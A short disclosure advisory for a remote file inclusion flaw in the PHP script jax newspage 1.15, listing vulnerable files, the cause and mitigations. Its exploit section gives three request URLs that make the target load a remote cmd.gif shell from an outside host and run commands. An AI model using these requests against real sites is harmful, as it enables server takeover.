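# BiyoSecurity.Org & SecurityWall.Org
# Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip
# Script Name : jax newspage
# Version : 1.15
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP

# Vulnerable Files :
/admin/index.php
/admin/news.admin.php
/newsarchive.php

# Vulnerable code :
// Global variables
require ( $path_to_script."globals.inc.php");

# Cause : the listed files build the require() path from $path_to_script, which (judging by the requests below) can be set from the query string. This presumably relies on register_globals being enabled, and the remote form on PHP being allowed to include URLs (allow_url_fopen / allow_url_include).

# Exploit :
http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls
http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls

# Mitigation : assign $path_to_script a fixed value inside each script before the require, so request data cannot override it. Keep register_globals and remote includes disabled in php.ini. Requests whose path_to_script parameter contains a URL are a useful indicator to search for in web server logs.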